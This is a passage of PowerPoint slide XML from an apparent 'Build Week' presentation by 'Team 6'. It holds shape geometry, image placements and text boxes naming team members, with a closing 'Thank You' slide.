          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="true" flipV="false" rot="0">
            <a:off x="12727672" y="0"/>
            <a:ext cx="5594531" cy="4868819"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4868819" w="5594531">
                <a:moveTo>
                  <a:pt x="5594530" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4868819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5594530" y="4868819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5594530" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-48012" t="-57743" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11464541" y="5837654"/>
            <a:ext cx="1689238" cy="1689231"/>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7525" t="0" r="-17525" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5532524" y="5792881"/>
            <a:ext cx="1701096" cy="1701089"/>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6666" r="0" b="-16666"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2502031" y="5760862"/>
            <a:ext cx="1744618" cy="1744611"/>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5911" r="0" b="-35679"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8317613" y="2966674"/>
            <a:ext cx="1721177" cy="1721170"/>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0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8519494" y="5812664"/>
            <a:ext cx="1661530" cy="1661523"/>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0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="14437296" y="5800428"/>
            <a:ext cx="1705052" cy="1705045"/>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16818" r="0" b="-16818"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="-903441" y="7664335"/>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ZHONGSHI L.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1835547" y="7664176"/>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MARA D.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5400000">
            <a:off x="5278521" y="8689352"/>
            <a:ext cx="3721144" cy="3562996"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3562996" w="3721144">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3721145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721145" y="3562996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3562996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5400000">
            <a:off x="3126212" y="-628295"/>
            <a:ext cx="3721144" cy="3562996"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3562996" w="3721144">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3721144" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721144" y="3562996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3562996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5400000">
            <a:off x="14188092" y="79074"/>
            <a:ext cx="3721144" cy="3562996"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3562996" w="3721144">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3721145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3721145" y="3562996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3562996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1983398" y="359214"/>
            <a:ext cx="9569767" cy="3488910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="14022"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10016">
                <a:solidFill>
                  <a:srgbClr val="E9E9E9"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>BUILD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10016">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>WEEK  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="14022"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5400000">
            <a:off x="-5158171" y="880787"/>
            <a:ext cx="7980595" cy="7641419"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7641419" w="7980595">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7980595" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7980595" y="7641419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7641419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 25" id="25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="4090459" y="2844856"/>
            <a:ext cx="3010427" cy="3103533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9562865" y="8689254"/>
            <a:ext cx="11453915" cy="801624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="5328"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" spc="-655">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>TEAM 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4986784" y="4840244"/>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FEDERICO B.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4915685" y="7664335"/>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ANDRÉ V.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7790204" y="7664335"/>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MARIO M.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10877009" y="7664335"/>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OTMAN H.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10625229" y="263964"/>
            <a:ext cx="2102442" cy="2580892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="21021"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15015">
                <a:solidFill>
                  <a:srgbClr val="E9E9E9"/>
                </a:solidFill>
                <a:latin typeface="TT Fors Display Bold"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 32" id="32"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5628733" y="2462586"/>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spc="824">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>TEAM LEADER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 33" id="33"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11075406" y="2734121"/>
            <a:ext cx="3010427" cy="3103533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 34" id="34"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1729228" y="5975119"/>
            <a:ext cx="3010427" cy="3103533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 35" id="35"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="4986784" y="5506745"/>
            <a:ext cx="3010427" cy="3103533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 36" id="36"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8244861" y="5217754"/>
            <a:ext cx="3010427" cy="3103533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 37" id="37"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13401429" y="5280921"/>
            <a:ext cx="3010427" cy="3103533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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205165" y="260070"/>
            <a:ext cx="8280581" cy="7680238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7680238" w="8280581">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8280581" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8280581" y="7680238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7680238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="9599056" y="7347530"/>
            <a:ext cx="8280581" cy="7680238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7680238" w="8280581">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8280580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8280580" y="7680238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7680238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14983666" y="7475596"/>
            <a:ext cx="5403739" cy="5174080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5174080" w="5403739">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5403739" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5403739" y="5174080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5174080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-4436442" y="-2259467"/>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5400000">
            <a:off x="4537307" y="-385473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10800000">
            <a:off x="-1560524" y="5143500"/>
            <a:ext cx="7096674" cy="6795066"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6795066" w="7096674">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7096674" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7096674" y="6795066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6795066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8738431" y="7138866"/>
            <a:ext cx="9951397" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="522259" y="98885"/>
            <a:ext cx="6165373" cy="12199250"/>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23177" t="0" r="-123177"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19" id="19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12345455" y="5872921"/>
            <a:ext cx="2411582" cy="2170424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8471055" y="2703058"/>
            <a:ext cx="8956986" cy="3495675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="12599"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18000" spc="-1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1977662" y="3694424"/>
            <a:ext cx="3254567" cy="4057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0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>Slide Masters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="911041" y="3361049"/>
            <a:ext cx="5387810" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" spc="-359">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Light"/>
              </a:rPr>
              <a:t>TEAM 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8738431" y="6131835"/>
            <a:ext cx="7214048" cy="490855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3919"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light Italics"/>
              </a:rPr>
              <a:t>CONTACT US FOR SLIDE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
